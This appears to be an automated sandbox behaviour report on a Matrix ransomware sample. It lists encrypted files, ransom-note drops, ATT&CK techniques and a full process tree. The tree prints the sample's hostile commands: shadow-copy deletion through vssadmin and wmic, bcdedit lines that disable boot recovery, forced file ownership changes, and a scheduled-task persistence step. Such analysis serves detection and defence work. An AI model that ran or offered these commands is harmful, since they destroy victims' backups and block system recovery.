File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0230553.WMF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240291.WMF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\OFFICE10.MMW	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\7-Zip\Lang\de.txt	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\System.Speech.resources.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tallinn	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libttml_plugin.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Google\Update\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0297229.WMF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14656_.GIF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Essential.eftx	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Singapore	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14583_.GIF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00269_.WMF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\ja\System.IdentityModel.Selectors.Resources.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\kcms.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jre7\bin\eula.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD00419_.WMF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0285444.WMF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\FOLDER.ICO	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\La_Paz	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Tahiti	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\Microsoft.Build.Engine.resources.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert.css	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jre7\bin\decora-sse.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Wake	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0281904.WMF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04355_.WMF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files\Microsoft Games\More Games\en-US\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\PresentationBuildTasks.resources.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfxrt.jar	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port_of_Spain	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_output\libafile_plugin.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Whitehorse	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\System.IdentityModel.Selectors.Resources.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BIZCARD.XML	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LABEL98.POC	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ReachFramework.dll	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0216588.WMF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151073.WMF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\#FOX_README#.rtf	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR40F.GIF	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

800 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1608 vssadmin.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeXPo38R1T64.exe

pid process

1792 powershell.exe
772 XPo38R1T64.exe
772 XPo38R1T64.exe
772 XPo38R1T64.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

XPo38R1T64.exe

pid process

772 XPo38R1T64.exe

pid	process
800	schtasks.exe

pid	process
1608	vssadmin.exe

pid	process
1792	powershell.exe
772	XPo38R1T64.exe
772	XPo38R1T64.exe
772	XPo38R1T64.exe

pid	process
772	XPo38R1T64.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

Processes:

powershell.exeXPo38R1T64.exevssvc.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	772	XPo38R1T64.exe
Token: SeLoadDriverPrivilege	772	XPo38R1T64.exe
Token: SeBackupPrivilege	1744	vssvc.exe
Token: SeRestorePrivilege	1744	vssvc.exe
Token: SeAuditPrivilege	1744	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1784	WMIC.exe
Token: SeSecurityPrivilege	1784	WMIC.exe
Token: SeTakeOwnershipPrivilege	1784	WMIC.exe
Token: SeLoadDriverPrivilege	1784	WMIC.exe
Token: SeSystemProfilePrivilege	1784	WMIC.exe
Token: SeSystemtimePrivilege	1784	WMIC.exe
Token: SeProfSingleProcessPrivilege	1784	WMIC.exe
Token: SeIncBasePriorityPrivilege	1784	WMIC.exe
Token: SeCreatePagefilePrivilege	1784	WMIC.exe
Token: SeBackupPrivilege	1784	WMIC.exe
Token: SeRestorePrivilege	1784	WMIC.exe
Token: SeShutdownPrivilege	1784	WMIC.exe
Token: SeDebugPrivilege	1784	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1784	WMIC.exe
Token: SeRemoteShutdownPrivilege	1784	WMIC.exe
Token: SeUndockPrivilege	1784	WMIC.exe
Token: SeManageVolumePrivilege	1784	WMIC.exe
Token: 33	1784	WMIC.exe
Token: 34	1784	WMIC.exe
Token: 35	1784	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1784	WMIC.exe
Token: SeSecurityPrivilege	1784	WMIC.exe
Token: SeTakeOwnershipPrivilege	1784	WMIC.exe
Token: SeLoadDriverPrivilege	1784	WMIC.exe
Token: SeSystemProfilePrivilege	1784	WMIC.exe
Token: SeSystemtimePrivilege	1784	WMIC.exe
Token: SeProfSingleProcessPrivilege	1784	WMIC.exe
Token: SeIncBasePriorityPrivilege	1784	WMIC.exe
Token: SeCreatePagefilePrivilege	1784	WMIC.exe
Token: SeBackupPrivilege	1784	WMIC.exe
Token: SeRestorePrivilege	1784	WMIC.exe
Token: SeShutdownPrivilege	1784	WMIC.exe
Token: SeDebugPrivilege	1784	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1784	WMIC.exe
Token: SeRemoteShutdownPrivilege	1784	WMIC.exe
Token: SeUndockPrivilege	1784	WMIC.exe
Token: SeManageVolumePrivilege	1784	WMIC.exe
Token: 33	1784	WMIC.exe
Token: 34	1784	WMIC.exe
Token: 35	1784	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.execmd.execmd.execmd.exewscript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1424 wrote to memory of 1204	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1204	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1204	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1204	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 904	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	NWb6U328.exe
PID 1424 wrote to memory of 904	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	NWb6U328.exe
PID 1424 wrote to memory of 904	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	NWb6U328.exe
PID 1424 wrote to memory of 904	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	NWb6U328.exe
PID 1424 wrote to memory of 1816	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1816	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1816	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1816	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1816 wrote to memory of 1792	1816	cmd.exe	powershell.exe
PID 1816 wrote to memory of 1792	1816	cmd.exe	powershell.exe
PID 1816 wrote to memory of 1792	1816	cmd.exe	powershell.exe
PID 1816 wrote to memory of 1792	1816	cmd.exe	powershell.exe
PID 1424 wrote to memory of 1404	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1404	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1404	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1404	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1192	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1192	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1192	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1192	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1404 wrote to memory of 1020	1404	cmd.exe	reg.exe
PID 1404 wrote to memory of 1020	1404	cmd.exe	reg.exe
PID 1404 wrote to memory of 1020	1404	cmd.exe	reg.exe
PID 1404 wrote to memory of 1020	1404	cmd.exe	reg.exe
PID 1192 wrote to memory of 972	1192	cmd.exe	wscript.exe
PID 1192 wrote to memory of 972	1192	cmd.exe	wscript.exe
PID 1192 wrote to memory of 972	1192	cmd.exe	wscript.exe
PID 1192 wrote to memory of 972	1192	cmd.exe	wscript.exe
PID 1404 wrote to memory of 1556	1404	cmd.exe	reg.exe
PID 1404 wrote to memory of 1556	1404	cmd.exe	reg.exe
PID 1404 wrote to memory of 1556	1404	cmd.exe	reg.exe
PID 1404 wrote to memory of 1556	1404	cmd.exe	reg.exe
PID 1404 wrote to memory of 1748	1404	cmd.exe	reg.exe
PID 1404 wrote to memory of 1748	1404	cmd.exe	reg.exe
PID 1404 wrote to memory of 1748	1404	cmd.exe	reg.exe
PID 1404 wrote to memory of 1748	1404	cmd.exe	reg.exe
PID 972 wrote to memory of 520	972	wscript.exe	cmd.exe
PID 972 wrote to memory of 520	972	wscript.exe	cmd.exe
PID 972 wrote to memory of 520	972	wscript.exe	cmd.exe
PID 972 wrote to memory of 520	972	wscript.exe	cmd.exe
PID 520 wrote to memory of 800	520	cmd.exe	schtasks.exe
PID 520 wrote to memory of 800	520	cmd.exe	schtasks.exe
PID 520 wrote to memory of 800	520	cmd.exe	schtasks.exe
PID 520 wrote to memory of 800	520	cmd.exe	schtasks.exe
PID 972 wrote to memory of 1204	972	wscript.exe	cmd.exe
PID 972 wrote to memory of 1204	972	wscript.exe	cmd.exe
PID 972 wrote to memory of 1204	972	wscript.exe	cmd.exe
PID 972 wrote to memory of 1204	972	wscript.exe	cmd.exe
PID 1204 wrote to memory of 1476	1204	cmd.exe	schtasks.exe
PID 1204 wrote to memory of 1476	1204	cmd.exe	schtasks.exe
PID 1204 wrote to memory of 1476	1204	cmd.exe	schtasks.exe
PID 1204 wrote to memory of 1476	1204	cmd.exe	schtasks.exe
PID 1424 wrote to memory of 1084	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1084	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1084	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1424 wrote to memory of 1084	1424	2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe	cmd.exe
PID 1084 wrote to memory of 1784	1084	cmd.exe	attrib.exe
PID 1084 wrote to memory of 1784	1084	cmd.exe	attrib.exe
PID 1084 wrote to memory of 1784	1084	cmd.exe	attrib.exe
PID 1084 wrote to memory of 1784	1084	cmd.exe	attrib.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1784 attrib.exe

pid	process
1784	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe
"C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1424
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3.exe" "C:\Users\Admin\AppData\Local\Temp\NWb6U328.exe"
  2⤵
  PID:1204
- C:\Users\Admin\AppData\Local\Temp\NWb6U328.exe
  "C:\Users\Admin\AppData\Local\Temp\NWb6U328.exe" -n
  2⤵
  - Executes dropped EXE
  PID:904
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FfRHK9B8.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\WVwHJllM.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\WVwHJllM.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1020
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\w9SzCseH.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1192
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\w9SzCseH.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:972
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\MCOOq9KH.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:520
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\MCOOq9KH.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:800
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1204
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\hwydVNNs.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1084
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Views/modifies file attributes
    PID:1784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Modifies file permissions
    PID:1556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XPo38R1T.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1368
  - - C:\Users\Admin\AppData\Local\Temp\XPo38R1T.exe
      XPo38R1T.exe -accepteula "StandardBusiness.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:996
    - - C:\Users\Admin\AppData\Local\Temp\XPo38R1T64.exe
        
        XPo38R1T.exe -accepteula "StandardBusiness.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Sets service image path in registry
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:772

C:\Windows\system32\taskeng.exe
taskeng.exe {8A0D1CCF-6210-429B-A2BC-0E22698C74A5} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
PID:2012
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\MCOOq9KH.bat"
  2⤵
  PID:1748
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1784
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1188
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1540
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:1692

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

